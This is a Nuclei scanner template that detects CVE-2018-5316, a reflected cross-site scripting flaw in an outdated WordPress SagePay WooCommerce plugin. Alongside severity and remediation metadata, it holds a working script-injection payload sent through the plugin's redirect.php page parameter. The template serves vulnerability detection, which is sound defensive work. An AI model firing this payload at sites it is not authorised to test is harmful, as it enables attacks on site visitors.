nuclei-templates/http/cves/2018/CVE-2018-5316.yaml

55 lines
2.3 KiB
YAML

id: CVE-2018-5316
info:
name: WordPress SagePay Server Gateway for WooCommerce <1.0.9 - Cross-Site Scripting
author: daffainfo
severity: medium
description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability.
reference:
- https://wordpress.org/support/topic/sagepay-server-gateway-for-woocommerce-1-0-7-cross-site-scripting/#post-9792337
- https://wordpress.org/plugins/sagepay-server-gateway-for-woocommerce/#developers
- https://packetstormsecurity.com/files/145459/WordPress-Sagepay-Server-Gateway-For-WooCommerce-1.0.7-XSS.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-5316
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-5316
cwe-id: CWE-79
epss-score: 0.00175
epss-percentile: 0.5452
cpe: cpe:2.3:a:patsatech:sagepay_server_gateway_for_woocommerce:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: patsatech
product: sagepay_server_gateway_for_woocommerce
framework: wordpress
tags: cve2018,wordpress,xss,wp-plugin,wp,woocommerce,packetstorm,cve,patsatech
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=</script>"><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script>"><script>alert(document.domain)</script>'
- 'Authenticate your card'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 490a00463044022059fbf2a70efbcacf6215b5821654b6dec537c9f3e4ba8fdf9e754697e659a5e40220232055bb505d422a17fd608cf34cec92afa0080f82f500181b3664c90317f5e9:922c64590222798bb761d5b6d8e72950